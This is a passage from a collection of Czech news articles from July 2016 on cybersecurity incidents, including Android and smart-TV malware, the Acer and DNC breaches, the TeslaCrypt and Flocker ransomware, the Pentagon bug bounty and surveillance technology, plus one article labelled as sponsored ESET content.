HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy v zařízení maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.


Piráti šmírovali uživatele přes chytrý televizor

27.7.2016 Zdroj: Novinky/Bezpečnost Hacking
Není žádným tajemstvím, že počítačoví piráti se v dnešní době dokážou už bez větších obtíží nabourat klidně i do chytrého televizoru. Ten s pomocí sofistikovaného škodlivého kódu poté mohou proměnit doslova v nástroj na šmírování, jak se o tom na vlastní kůži přesvědčil jeden pár z Anglie.
V jejich chytrém televizoru se totiž uhnízdil nezvaný návštěvník, prostřednictvím kterého mohli počítačoví piráti na dálku ovládat některé funkce, aniž by o tom měli majitelé ponětí.

Muž a žena, kteří se stali obětí útoku, měli tu smůlu, že si pořídili poměrně sofistikovaný televizor. Ten byl vybaven vlastním operačním systémem a navíc byl plně připraven na videokonference, byla v něm tedy zabudovaná webkamera a samozřejmě také mikrofon.

A přesně toho kyberzločinci využili, jak upozornil server Uniland. Pár totiž začali na dálku šmírovat. Pomocí webkamery a mikrofonu. Podařilo se jim natočit například i to, jak se na sedačce před TV oddávají milostným radovánkám.

Lechtivé video zveřejnili na webu
Páru pak udělali ze života doslova peklo, protože intimní záběry z jejich soukromí nahráli na server s erotickou tematikou. Tím se vlastně přišlo i na to, jak záběry vznikly, a že muže a ženu počítačoví piráti šmírovali prostřednictvím chytrého televizoru.

Právě provozovatelé zmiňovaných pornostránek celou kauzu zveřejnili. Obrátil se na ně totiž pár, který je požádal o stažení videa. Provozovatelé jim vyhověli a zveřejněním detailů chtěli prý upozornit na rizika, která chytré televizory představují.

Většina počítačů je totiž proti vyděračským virům chráněna pomocí antivirových programů, například u televizorů ale zabezpečení řeší jen málokdo. Výrobci přitom antiviry pro chytré televizory nabízejí již několik let. Většina uživatelů si patrně ale ani neuvědomuje, že i tato zařízení mohou být napadena.

Virus dokáže uzamknout televizor
Právě kvůli tomu se kyberzločinci pravděpodobně zaměřují na televizní systémy stále častěji. V polovině června se například ukázalo, že chytrý televizor může být napaden například i vyděračským virem.

Ten přístroj uzamkne a za jeho zpřístupnění požaduje zaplatit výkupné. Vyděračský škodlivý kód se jmenuje Flocker a kromě TV dokáže podobným způsobem potrápit také uživatele klasických počítačů, jak již dříve varovali bezpečnostní výzkumníci antivirové společnosti Trend Micro.


Hackeři získali přístup na účet exšéfa Twitteru

27.7.2016  Zdroj: Novinky/Bezpečnost Hacking
Hackerská skupina OurMine, která na začátku června získala přístup na některé internetové účty šéfa Facebooku Marka Zuckerberga, má další cenný úlovek. Tentokráte se nabourali na twitterový účet Dicka Costola, bývalého šéfa mikroblogovací sítě Twitter. Upozornil na to server The Hacker News.
Na twitterový účet Costola se počítačoví piráti dostali podle všeho už na konci minulého týdne. Pod jeho jménem pak zveřejnili několik příspěvků, které dokazují, že se na účet exšéfa Twitteru skutečně nabourali.

„Tady je OurMine, pouze jsme testovali zabezpečení vašeho účtu. Prosíme, kontaktujte nás,“ uvedli hackeři o víkendu na Twitteru. Jen pár desítek minut po zveřejnění však byly veškeré příspěvky od počítačových pirátů smazány.

Costolo po útoku pouze konstatoval, že hackeři nezískali přístup k jeho twitterovému účtu, ale k aplikaci, prostřednictvím které se přihlašoval k Twitteru. Šlo prý o starou aplikaci, kterou už dávno nepoužíval.

Úlovků mají hackeři více
To ale samozřejmě nemění nic na tom, že skupina OurMine, která podle všeho pochází ze Saudské Arábie, má další velký úlovek na svém kontě.

Zkraje června se hackerům podařilo napadnout Twitter a některé další on-line účty šéfa Facebooku Marka Zuckerberga. Krátce nato Twitter zablokoval jejich účet na Twitteru, prostřednictvím kterého informovali o úspěšných útocích. 

Na přelomu května a června se pak skupině OurMine podařilo získat přístup k internetovým účtům zakladatele Microsoftu Billa Gatese či zpěváka Christiana Collinse.


Internet Explorer i Windows mají kritické bezpečnostní chyby

27.7.2016 Zdroj: Novinky/Bezpečnost Zranitelnosti
Společnost Microsoft v úterý vydala pravidelný balík záplat pro chyby ve svých produktech. Kritické zranitelnosti byly odhaleny v operačním systému Windows, kancelářském balíku Office a webových prohlížečích Internet Explorer a Edge.
Kritické chyby mohou počítačoví piráti zneužít k tomu, aby do počítače propašovali prakticky libovolný škodlivý kód. Stejně tak ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.

Pro kritické zranitelnosti bylo vydáno celkem pět bezpečnostních záplat. Pro všechny objevené chyby jsou již k dispozici záplaty. Microsoft je vydal v rámci pravidelných aktualizací, které vycházejí vždy druhé úterý v měsíci.

11 důležitých updatů
Zbylých 11 updatů, které vyšly společně s balíkem pravidelných aktualizací, zástupci amerického softwarového gigantu označují jako důležité.

Ty slouží především ke zlepšení funkčnosti samotného systému, ale například také kancelářského balíku Office. Důležité záplaty by neměly pro uživatele představovat žádné velké bezpečnostní riziko.

S aktualizacemi neotálet
Stahovat všechny záplaty pro kritické trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.

V případě, že uživatelé nemají nastavenou automatickou instalaci aktualizací, neměli by s jejich stažením otálet. V opačném případě nechávají pro počítačové piráty otevřena zadní vrátka do svých počítačů.


Proč si lidé zakrývají kameru na notebooku

27.7.2016 Zdroj: Novinky/Bezpečnost Zabezpečení
Během poloviny posledního desetiletí se technologický průmysl předháněl v tom, abychom měli čím dál lepší kamery v zařízeních, která každodenně používáme. Ovšem tento trend s sebou teď začíná přinášet kuriózní protiakci - rozvíjí se nové průmyslové odvětví, které se zaměřuje na výrobu krytek na zvědavé oko kamer. Jde o výrobky od levných nálepek až po značkové plastové záklopky navržené tak, aby zakryly kameru na telefonu, laptopu, a dokonce i na televizi.
Po celé roky odborníci na bezpečnost nejen tvrdili, ale často i názorně dokazovali, jak se hackeři dokážou dostat do kamer a sledovat všechno, co se děje na opačném konci. Abyste dosah tohoto sdělení pochopili, zkuste si představit, co všechno vás už váš laptop nebo telefon „viděl” dělat.

Tato varování konečně padla na úrodnou půdu. „Zalepil jsem si kameru kouskem lepenky, protože jsem totéž viděl udělat někoho, kdo je chytřejší než já," prohlásil v dubnu ředitel amerického Federálního úřadu pro vyšetřování (FBI) James Comey.

Společnost Idea Stage Promotions označuje svou krytku Webcam Cover 1.0 za „nejžhavější propagační předmět na trhu", zatímco kabelová televize USA Networks poslala novinářům krytku na webové kamery s názvem „Mr Robot", napsal list The Guardian.

Internet se neustále dívá
Zakrývání kamer ovšem není nic nového pro ty, kdo vědí, že internet se neustále dívá. Politoložka nadace Electronic Frontier Foundation (EFF) Eva Galperinová říká, že zakrývá vševidoucí oko od chvíle, kdy si v roce 2007 koupila první laptop se zabudovanou kamerou na obrazovce – MacBook Pro.

EFF začala tisknout své první nálepky na zakrytí webových kamer v roce 2013 a také prodává i rozdává nálepky s nápisem „Tyto odstranitelné nálepky jsou pro hackery neprůstřelnou technologií na obranu proti sledování”. A lidé si je podle nadace pravidelně kupují.

Znamená to, že jsme všichni paranoidní? No, nejde o žádnou sci-fi. Vědci v roce 2013 předvedli, jak dokážou aktivovat kameru v MacBooku, aniž by se rozsvítilo zelené světýlko naznačující, že je zapnutá. Jeden pár také tvrdí, že se na internetu objevilo jejich video při sexu, které pořídil hacker, který se dostal do kamery jejich chytré televize. A také záznamy amerického federálního soudu dokazují, že i FBI ví, jak použít kamery v laptopech ke špehování jejich uživatelů.

Jsou ale i tací, kdo se tímto trendem zatím strhnout nenechali. Třeba odborník na šifrování z Univerzity Johnse Hopkinse Matthew Green na otázku, proč si nezakrývá svou kameru, odpověděl: „Protože jsem idiot.” A dodal. „Jinou omluvu pro to, proč tuhle záležitost neberu vážně, opravdu nemám. Ale koneckonců si říkám, že vidět mě nahého by už samo o sobě bylo pro kohokoli dost velkým trestem.”


Češi si dovolenou bez chytrého telefonu nedovedou představit. Podceňují ale bezpečnost

27.7.2016 Zdroj: Novinky/Bezpečnost Mobilní
Komerční článek - Letní dovolenou bez chytrého telefonu, tabletu nebo notebooku připojeného k internetu si nedovede představit 85 procent obyvatel Česka.
Právě tak velká část populace využila internetového připojení během své poslední dovolené, vyplynulo z průzkumu, který na vzorku 778 lidí provedla společnost ESET ve spolupráci s portálem Seznam.cz.

Sledujeme vzestupnou tendenci při používání zařízení s přístupem na internet během dovolené
Miroslav Dvořák, technický ředitel společnosti ESET
Možnost být on-line přímo vyžadovalo 17 procent respondentů, pro 73 procent byla tato možnost vítaná, ale ne stěžejní. Pouze desetina dotázaných internet na dovolené přímo odmítá.

„Dlouhodobě sledujeme vzestupnou tendenci při používání zařízení s přístupem na internet během dovolené a je to logické. Hledáme restaurace, dopravní spojení, turistické informace a podobně. Pro určitou věkovou kategorii je rovněž důležité mít neustále k dispozici přístup na sociální sítě,“ hodnotí výsledky průzkumu Miroslav Dvořák, technický ředitel společnosti ESET.

Mezi lidmi, kteří využívají internet na dovolené, lehce převažují muži (89 procent dotázaných) nad ženami (79 procent). Nejčastěji internet vyžadují teenageři a mladí lidé ve věku od 10 do 24 let, nejméně lidé nad 45 let.

Před krádeží mobilu se chrání třetina lidí
Pokud si Češi na dovolenou vezmou notebook, tablet nebo chytrý telefon, takřka vždy jej během volných dní využijí a připojí se k internetu. Podle výsledků průzkumu tak učiní 96 procent dotázaných. Nejčastějším zařízením, přes které se připojují, je chytrý telefon (70 procent respondentů), méně zastoupen bývá notebook (34 procent) a tablet (22 procent). Bezmála dvě třetiny (60 procent) respondentů se během dovolené alespoň jednou připojí k veřejné wi-fi síti. Z této skupiny však každý pátý uživatel nepoužívá žádný antivir.

Velmi účinnou ochranou pro mobilní zařízení je aplikace ESET Mobile Security
V případě krádeže má šanci na vrácení zařízení 31 procent uživatelů, protože pro své mobily, počítače nebo tablety používají tzv. anti-theft nástroje. Celkem 11 procent respondentů, kteří si svá zařízení k připojení na internet vozí s sebou, je má všechna chráněna jak s pomocí antiviru, tak anti-theft nástrojů.

„Velice pozitivně hodnotíme to, že 42 procent uživatelů má zabezpečena veškerá svá zařízení. Například ještě donedávna uživatelé chytrých mobilních telefonů tato rizika značně podceňovali, nyní sledujeme trend obrácení k lepšímu,“ hodnotí Dvořák a dodává: „To samé platí pro nástroje anti-theft, které pomáhají lokalizovat zařízení v případě ztráty nebo odcizení.“

Velmi účinnou ochranou pro mobilní zařízení je aplikace ESET Mobile Security pro Android. Nejenže obsahuje klasický antivir a chrání před phishingovými útoky a zabezpečí internetové bankovnictví, ale v případě krádeže lze zařízení lokalizovat pomocí GPS souřadnic a aktivovat zvukovou sirénu, zamknout přístroj či z něj smazat citlivá data. Pokud je zařízení vzdáleně označeno za odcizené nebo ztracené, začne automaticky pořizovat fotografie svého okolí, které ukládá na uživatelský účet majitele na my.eset.com. To pak může pomoci při odhalení totožnosti zloděje.

Zrádné sociální sítě
Letní dovolenou ale nemusí zkazit přímo krádež mobilu či tabletu. Stačí, když uživatelé těchto zařízení neuváženě sdílejí fotografie z cest na sociálních sítích. Podle výsledků průzkumu tak činí až třetina respondentů, většinou mladí lidé a ženy. „Z pohledu bezpečnosti je sdílení zážitků přímo z dovolené problematické. Nehledě na to, že mnohé informace například o místě pořízení obrázku jsou umístěny přímo v souboru fotografie, rizikové je především chování uživatelů. Pokud takto potenciálním útočníkům na relativně veřejných sociálních sítích říkáme, že zkrátka nejsme doma, zvyšujeme tím riziko krádeže či vloupání,“ upozorňuje technický ředitel společnosti ESET Miroslav Dvořák.

Samostatnou kapitolou je chování dětí na sociálních sítích. Nejmenší uživatelé internetu často sdílejí fotografie, které nejsou vhodné a lze je lehce zneužít. Rodiče tomu mohou předejít používáním nástrojů rodičovské kontroly, například aplikace ESET Parental Control pro Android. Díky ní lze na každém zařízení nastavit pro jednotlivé uživatelské účty individuální pravidla pro používání internetu, například odfiltrovat potenciálně nebezpečné stránky. Dítě tak může mít v době nepřítomnosti rodičů zablokovaný přístup na Facebook, případně omezenou možnost využívání internetového připojení jen na určitou dobu během dne.

Rodiče uvítají i další funkci ESET Parental Control, která jim umožní lokalizovat chytrý mobilní telefon nebo tablet dítěte a zjistit tak, kde se jejich potomek zrovna nachází. Z předdefinovaných telefonních čísel pak lze dítěti na telefon poslat rodičovskou zprávu, která do doby, než na ni dítě zareaguje, zablokuje telefon pro jakékoli jiné použití. Nastavení pro jednotlivé uživatelské účty lze měnit a spravovat i na dálku prostřednictvím internetu. Dítě například může rodiče požádat o výjimku ze stanovených pravidel.

Základním předpokladem pro bezproblémové používání internetu během dovolené je ale dodržování zásad bezpečného chování na webu. Fotografie je vhodné veřejně sdílet až po dovolené, nikoliv během ní. K používání internetového bankovnictví přistupujte s rozmyslem. Pokud je to nutné, zkontrolujte si důvěryhodnost digitálního certifikátu stránky bankovnictví – nejčastěji v podobě zeleného zvýraznění či podbarvení adresního řádku prohlížeče. Pokud to vaše banka umožňuje, používejte dvoufaktorovou autentizaci. Používejte kvalitní antivirové nástroje, a to jak ve vašem přenosném počítači, tak i u vašeho tabletu či chytrého telefonu, využívají-li operační systém Android. Zvažte nástroje, které vám pomohou v případě ztráty či krádeže vašich zařízení.


Servery Aceru terčem útoku. Piráti získali údaje o platebních kartách uživatelů

27.7.2016  Zdroj: Novinky/Bezpečnost Hacking
Počítačoví piráti podnikli v minulých měsících útok na servery společnosti Acer v USA. Ten byl úspěšný, kyberzločinci se tak zmocnili důvěrných dat o zákaznících tohoto počítačového gigantu. Mezi nimi jsou i údaje o platebních kartách, které mohou piráti snadno zneužít. Upozornil na to server Neowin.
Terčem útoku měla být americká verze elektronického obchodu společnosti Acer. Další servery se prověřují.
Terčem útoku měla být americká verze elektronického obchodu společnosti Acer. Další servery se prověřují.
Podle zjištění bezpečnostních expertů měla zatím nezjištěná hackerská skupina přístup na servery Aceru od 12. května 2015 od 28. dubna 2016. Zástupci počítačového gigantu však o průniku informovali až na konci minulého týdne.

Podle prohlášení firmy se počítačoví piráti dostali k citlivým datům jednotlivých zákazníků. Konkrétně ke jménům a adresám, unikly však například i informace o platebních kartách uložených v databázi. Hackeři tak mají k dispozici čísla karet, datum konce jejich platnosti a v neposlední řadě i několikamístné bezpečnostní kódy.

Ochrana plateb pomocí SMS zprávy
To jinými slovy znamená, že mají vše potřebné k tomu, aby mohli provádět platby na internetu. V bezpečí jsou teoreticky uživatelé, kteří mají platby na internetu prostřednictvím karty chráněné ještě potvrzovací SMS zprávou ve svém mobilu. V takovém případě jsou uživatelé v bezpečí.

Přihlašovací údaje k účtům u společnosti Acer prý odcizena nebyla.

Podle prvních indicií se útok týkal především americké verze elektronického obchodu společnosti Acer. Kolika uživatelů se útok týká, výrobce zatím neproradil.

Další servery se zatím prověřují
Zástupci počítačového gigantu se navíc nechali slyšet, že prověřují možné napadení serverů počítačovými piráti i v jiných státech. Není tedy vyloučeno, že v ohrožení budou například i uživatelé z Evropy.

Acer nicméně podle serveru Neowin upozornil zákazníky, že by měli z bezpečnostních důvodů zkontrolovat své výpisy z bankovních účtů od května loňského roku. Zároveň by měli být ostražití i v případě všech budoucích výpisů, hackeři totiž mohou karty zneužít i poté, co jim byl zamezen přístup na napadené servery.

V případě jakéhokoliv podezření na neoprávněné platby z účtu by se lidé měli obrátit na svou banku.


Hackeři našli v síti Pentagonu 138 bezpečnostních děr

27.7.2016  Zdroj: Novinky/Bezpečnost Zranitelnosti
Velmi netradičním způsobem se americké ministerstvo obrany rozhodlo otestovat bezpečnost své sítě a dalších počítačových systémů. Uspořádalo soutěž, ve které se hackeři mohli předhánět, kdo najde více bezpečnostních trhlin. A málo jich rozhodně nebylo…
Hledat chyby v sítích Pentagonu mohli hackeři beztrestně jeden celý měsíc. Do unikátního programu se přihlásilo více než 1400 technologických nadšenců, kteří za pouhých třicet dní odhalili celkem 138 závažných bezpečnostních děr.

Ty nebyly žádným způsobem zneužity. Díky tomu, že na ně hackeři upozornili, mohli je bezpečnostní experti amerického ministerstva obrany opravit.

Nejúspěšnější hacker získal statisíce
O výsledcích hackerského klání informoval na konci minulého týdne americký ministr obrany Ashton Carter s tím, že nejúspěšnější hledač bezpečnostních chyb obdržel odměnu ve výši 25 000 dolarů, tedy bezmála 600 tisíc korun.

Celkově měl Pentagon na odměny pro hackery vyčleněno 75 000 dolarů 1,8 miliónu korun.

Carter se netajil tím, že ministerstvo na podobné soutěži velmi vydělalo. Kdyby si totiž najalo nějakou specializovanou firmu na hledání bezpečnostních trhlin, odměny by se pohybovaly v řádech miliónů dolarů.

Zároveň zdůraznil, že se Pentagonu touto netradiční soutěží podařilo navázat kontakt s „inovativními“ lidmi, kteří evidentně mají zájem pomáhat s obranou své vlasti. Nevyloučil, že v podobných kláních bude americké ministerstvo obrany pokračovat i nadále.


Zákeřný virus vydělal kyberzločincům miliardy

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Šířit vyděračské viry je velmi výhodný byznys, většina obětí totiž ve strachu ze ztráty drahocenných dat útočníkům zaplatí. Podle odhadů amerického Federálního úřadu pro vyšetřování (FBI) jeden konkrétní škodlivý virus vydělal počítačovým pirátům miliardy. Upozornil na to server Security Affairs.
Jak útočí vyděračské viry

Na napadeném stroji dokážou vyděračské viry udělat pěkný nepořádek. Nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.
Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.
Zaplatit zpravidla chtějí v bitcoinech, protože pohyby této virtuální měny se prakticky nedají vystopovat. A tím logicky ani nelegální aktivita počítačových pirátů.
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné. V případě škodlivého kódu TeslaCrypt to však už nyní neplatí.
čtvrtek 16. června 2016, 11:09
Počítačoví piráti si měli přijít na velké peníze díky škodlivému kódu zvanému TeslaCrypt. Jen za první čtvrtletí letošního roku jim tento nezvaný návštěvník vydělal podle odhadů FBI více než 200 miliónů dolarů, tedy v přepočtu bezmála pět miliard korun.

V současnosti již TeslaCrypt hrozbu nepředstavuje, protože útočníci zveřejnili dešifrovací klíč a uživatelům se za způsobené problémy omluvili.

Peníze ale samozřejmě nikomu nevrátili. A nic nenasvědčuje tomu, že by se miliardy nebo samotné počítačové piráty vyšetřovatelům podařilo vypátrat. Slehla se po nich zem.

Firemní síť je jako jackpot
Jak je z řádků výše patrné, kyberzločincům se nasazování vyděračských virů jednoznačně vyplácí. To je patrně jeden z hlavních důvodů, proč se po síti šíří doslova jako lavina. Na přelomu března a dubna dokonce bezpečnostní experti bili na poplach s tím, že škodlivých kódů požadujících výkupné dramaticky přibylo. 

I když se může zdát, že počítačoví piráti terorizují prostřednictvím vyděračských virů především jednotlivé uživatele, je tomu přesně naopak. Největších výdělků totiž dosahují ve chvíli, kdy se jim škodlivý kód podaří podsunout do firemní sítě.

To jasně dokazuje i případ ze začátku června, kdy se kyberzločinci zaměřili na počítačové systémy kanadské univerzity v Calgary. Pirátům se totiž podařilo nakazit více než stovku tamních PC vyděračským virem a za jejich zpřístupnění požadovali bezmála půlmiliónové výkupné. 

S ohledem na to, že byla zcela paralyzována e-mailová komunikace a že se univerzitní administrátoři nemohli dostat do jednotlivých PC, kde byla uložena důležitá data, rozhodlo se vedení univerzity požadavku hackerů vyhovět. Výkupné zaplatili.

Výkupné neplatit, radí experti
To přitom bezpečnostní experti několik posledních měsíců důrazně nedoporučují. Ani po zaplacení výkupného se totiž uživatelé ke svým datům nemusí dostat. Místo placení výkupného je nutné virus z počítače odinstalovat, k nezálohovaným datům se ale lidé zpravidla již nedostanou.

Placení výkupného je pro počítačové piráty v podstatě motivací k dalším útokům, upozornil server The Hacker News. Relativně snadný zisk jim pouze potvrdí to, že podobné útoky se jim vyplatí.

Zda se nakonec podařilo po zaplacení výkupného dostat pracovníkům univerzity k datům, není zatím jasné. Jisté je nicméně to, že počítačoví piráti si poměrně slušně vydělali.


Technologické novinky stírají hranice soukromí a špehování

27.7.2016  Zdroj: Novinky/Bezpečnost Ochrany
Podniky, které jsou s to odposlouchávat hovory svých zaměstnanců přes mobilní telefony? Chytrý telefon, který ve zlomku vteřiny přiřadí jméno ke každé tváři? Tyto dvě novinky nejsou v Rusku sci-fi, ale dalším krokem stírajícím hranice mezi soukromím a špehováním, píše agentura AFP.
Natalja Kasperská ve své kanceláři s výhledem na lesy na západ od Moskvy neskrývá překvapení nad bouří, která se rozpoutala okolo její firmy, specializující se na počítačovou bezpečnost podniků. Polemiku odstartovalo odhalení listu Kommersant, že její firma InfoWatch vyvíjí program, který analyzuje hovory v mobilech a hlásí to, co se mu zdá být „podezřelé”. Cílem je poskytnout velkým podnikům nástroj, který by chránil obchodní tajemství před úniky informací.

„Nečekali jsme to. Pro nás to byl jen další komunikační kanál,” tvrdí Kasperská, která v roce 1997 stála u vzniku světově uznávané firmy Kasperky Lab.

InfoWatch už zákazníkům nabízí programy analyzující elektronickou poštu zaměstnanců, jejich klíče USB a tiskárny. Ale nikoli hlasovou analýzu, požadovanou některými klienty z řad bank, ropného průmyslu či velkých státních korporací.

SORM umožňuje sledovat hovory na internetu
Představa překročení této meze vyvolala živou odezvu v zemi, kde se za sovětského režimu mikrofony tajné policie KGB pletly lidem do života a hluboce poznamenaly lidovou kulturu, překypující „špiónskými” historkami. I v současnosti se odposlechy jeví jako běžná praxe, tvrdí nevládní organizace Agora. Podle ní soudy od roku 2007 povolily sledovat devět miliónů Rusů, zejména opozičníků a aktivistů.

Kromě toho nástupkyně KGB, tajná služba FSB, už dlouho disponuje vyspělým systémem SORM, který umožňuje sledovat telefonáty a hovory na internetu. V tomto oboru Rusové zdaleka nejsou jediní na světě, jak odhalil po svém zběhnutí americký tajný agent Edward Snowden.

Projekt InfoWatch byl označen za zjevné špehování, které právníci a politici považují za ilegální. Předseda Státní dumy Sergej Naryškin vyjádřil obavy z možného škodlivého zneužití této technologie. Ministr Nikolaj Nikoforov ujistil, že odposlechy smějí povolit jedině soudy.

InfoWatch trvá na tom, že projekt je teprve v počátečním stadiu, a snaží se uklidnit obavy ujišťováním, že se má týkat jen obchodních hovorů, a to za souhlasu zaměstnanců. Analyzovat hovory budou jedině roboti, a ne lidé, a to na základě jistých klíčových slov.

„Musíme dokázat, že náš systém není telefonickým odposlechem. V žádném případě neuvedeme na trh program, který by nerespektoval zákon,” říká Kasperská. Nicméně varuje, že „technický pokrok směřuje pomalu, ale jistě ke světu, ve kterém nebudou žádná tajemství”.

FindFace zaznamenal raketový úspěch
Jev ilustruje ruská aplikace, která umožňuje uživateli chytrého telefonu identifikovat člověka vyfotografovaného na ulici – za podmínky, že jeho tvář figuruje v populární sociální síti VKontakte, čítající 350 miliónů účtů.

Aplikace FindFace dokáže během půl vteřiny porovnat databázi 300 miliónů snímků, vysvětluje její šestadvacetiletý tvůrce Arťom Kucharenko.

Aplikace zaznamenala raketový úspěch, s více než miliónem stažení během několika týdnů. V médiích vyvolaly rozruch její výsledky, ať už šlo o obtěžování herečky pornografických snímků, anebo o identifikaci žhářů z Petrohradu.

„Je to ukázka naší technologie," říká mladý programátor Kucharenko, očekávající „reálné využití” od bezpečnostních služeb, bank – a také seznamek, které dokážou identifikovat potkanou osobu a nabídnout podobné typy. Tvrdí, že zájem projevují firmy z celého světa. Z databáze přitom vymaže každého, kdo si to přeje. Aplikace podle něj již přiměla uživatele přemýšlet o snímcích, ke kterým umožňují volný přístup.

Bezpečnostní expert Michail Jemeljannikov míní, že „tato technologie neporušuje zákon”, protože využívá již volně přístupné fotografie. „Až pak začnou problémy, tedy k jakým účelům budou výsledky využity,” poznamenal a varoval, že ať v Rusku či jinde „zákony se nikdy nevyvíjejí tak rychle jako technologie”.


Vyděračské viry dokážou zamknout už i televizor

27.7.2016  Zdroj: Novinky/Bezpečnost Viry
Vyděračské viry, které uzamknou zařízení a za jeho odemčení požadují výkupné, doposud dělaly vrásky na čele především majitelům klasických počítačů a chytrých telefonů. Nově se ale podvodníci zaměřují na chytré televizory, upozornil server The Hacker News.
Škodlivý kód napadající chytré televizory je známý pod názvem Frantic Locker či Flocker. Objevili jej bezpečnostní výzkumníci antivirové společnosti Trend Micro.

Tento nezvaný návštěvník terorizoval nejprve klasické počítače, a to už od poloviny loňského roku. Kyberzločinci jej však nyní upravili tak, aby dokázal stejným způsobem napadat také chytré televizory. Zaměřuje se přitom výhradně na modely s operačním systémem Android TV.

Stejný scénář jako při útoku na PC
Útok probíhá velmi podobně jako u klasických PC. Virus se nejdříve uhnízdí v televizoru a pak jej zcela uzamkne. Uživatel tak s přístrojem nemůže vůbec nic dělat, maximálně jej tak zapnout či vypnout. Na obrazovce se neustále zobrazuje výzva k zaplacení výkupného.

Počítačoví piráti se snaží důvěřivce přesvědčit, že výkupné je ve skutečnosti pokuta, která byla vyměřena za nějaký trestný čin či nedovolené nakládání s autorsky chráněnými díly. TV bude údajně opět zpřístupněna, pokud zaplatí výkupné ve výši 200 dolarů, tedy v přepočtu více než 4800 Kč.

Kolik televizorů se škodlivému kódu podařilo výše popsaným způsobem napadnout, zatím není jasné. Výzkumníci neprozradili ani to, zda se tento nezvaný návštěvník objevil také v Česku.

Zabezpečení řeší málokdo
Flocker nicméně jasně ukazuje, jak zranitelná mohou být zařízení připojená k internetu. Většina počítačů je totiž proti vyděračským virům chráněna pomocí antivirových programů, například u televizorů ale zabezpečení řeší jen málokdo.

Výrobci přitom antiviry pro chytré televizory nabízejí již několik let. Většina uživatelů si patrně ale ani neuvědomuje, že i tato zařízení mohou být napadena.

To je případ i chytrých telefonů, na kterých používá antivirový program málokdo. Přitom právě na smartphony se kyberzločinci zaměřují v poslední době stále častěji. Bezpečnostní experti už v únoru varovali před prudkým nárůstem vyděračských virů útočících na mobily s Androidem.


V počítačové síti amerických demokratů se zabydleli ruští hackeři

27.7.2016 Zdroj: Novinky/Bezpečnost Hacking
Ruští vládní hackeři pronikli do počítačové vnitřní sítě vedení americké Demokratické strany, kde získali přístup do celé databáze o republikánském prezidentském kandidátovi Donaldu Trumpovi. E-maily mohli číst celý rok. V úterý to uvedl list The Washington Post s odvoláním na představitele strany a bezpečnostní experty, kteří měli na starosti řešit průnik.
Podle stranických bezpečnostních expertů po průniku do sítě mohli číst také veškeré e-maily a vzkazy na vnitřní chatovací síti.

Někteří hackeři měli přístup do vnitřní sítě vedení Demokratické strany po celý rok, ale všichni byli vytlačeni o víkendu při velkém čištění počítačů. Identifikovány byly dvě hackerské skupiny, které útočily nezávisle na sobě, napsal The Washington Post. Jedna akce byla zřejmě dílem ruské kontrarozvědky FSB, druhá ruské vojenské rozvědky GRU.

Vedení strany uvedlo, že neunikla žádná z finančních informací o peněžních darech ani osobní údaje. To podle něj naznačuje, že průnik měl špionážní cíle a nešlo o běžné kriminálníky.

To, kam až hackeři pronikli, potvrzuje schopnosti ruských vládních hackerů a ukazuje, zájem Moskvy porozumět dění v USA, znát předem slabiny budoucího prezidenta.

Sofistikovaný útok
Shawn Henry, prezident společnosti CrowdStrike, která měla za úkol napadení řešit, uvedl, že pro civilní organizaci je velmi obtížné čelit takto sofistikovanému útoku. Přitom naznačil, kdo za ním stál.

„Prací každé zahraniční tajné služby je sbírat zpravodajské informace proti svým nepřátelům,“ uvedl Henry.

Identifikovány byly dvě hackerské skupiny, které útočily nezávisle na sobě. Jedna akce byla zřejmě dílem ruské kontrarozvědky FSB, druhá ruské vojenské rozvědky GRU.

Ruské dementi
I když se útok připisuje ruským vládním hackerům, ruská ambasáda, uvedla, že o ničem neví. I mluvčí prezidenta Vladimira Putina americká obvinění odmítl.

"Zcela vylučuji, že by ruská vláda nebo vládní úřady byly do tohoto zapleteny," řekl novinářům mluvčí Dmitrij Peskov.

Putinův internetový poradce German Klimenko agentuře RIA Novosti řekl, že americká obvinění mohou být pokusem ospravedlnit "intrikami nepřátel" slabou ochranu počítačových systémů.

Vedení demokratů ale bylo jen jedním z terčů. Ruští hackeři podle WP též napadli sítě obou vítězů primárek Hillary Clintonové a Donalda Trumpa i sítě některých akčních výborů republikánů. Detaily o těchto útocích ale podle listu nejsou k dispozici.


Výkupné platit netřeba, vyzrát na vyděračský virus je možné zadarmo

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Vyděračský virus TeslaCrypt, který dokázal na pevném disku zašifrovat data a za jejich zpřístupnění požadoval výkupné, už hrozbu pro uživatele nepředstavuje. Bezpečnostní experti totiž vydali zdarma dostupný nástroj, prostřednictvím kterého je možné uložená data odšifrovat a nezvaného návštěvníka z počítače vyhnat. Upozornil na to server Security Affairs.
Dešifrovací klíč zveřejnili samotní počítačoví piráti už na konci května, jak Novinky.cz již dříve informovaly. Tehdy se zároveň omluvili za způsobené problémy. 

Na to prakticky okamžitě zareagovala společnost Eset, která zveřejnila bezplatný nástroj, který si s vyděračským virem dokázal poradit. Stahovat jej je možné zdarma zde.

Podle serveru Security Affairs si však tento nástroj poradí pouze s dvěma novějšími verzemi TeslaCryptu. Na dvě starší, které se internetem šířily jako první, je tedy údajně krátký.

Poradí si i se staršími verzemi viru
Uživatelům, jejichž stroje byly napadeny starší verzí tohoto škodlivého kódu, se však nyní také nabízí řešení. Bezpečnostní tým Talos společnosti Cisco totiž vydal dešifrovací nástroj, který si dokáže poradit i s prvními dvěma verzemi vyděračského viru.

Sluší se však podotknout, že nový dešifrovací nástroj si dovede poradit skutečně jen s hrozbou TeslaCrypt. Pokud byla data na počítači zašifrována jiným vyděračským virem z rodiny ransomware, nástroj fungovat nebude.

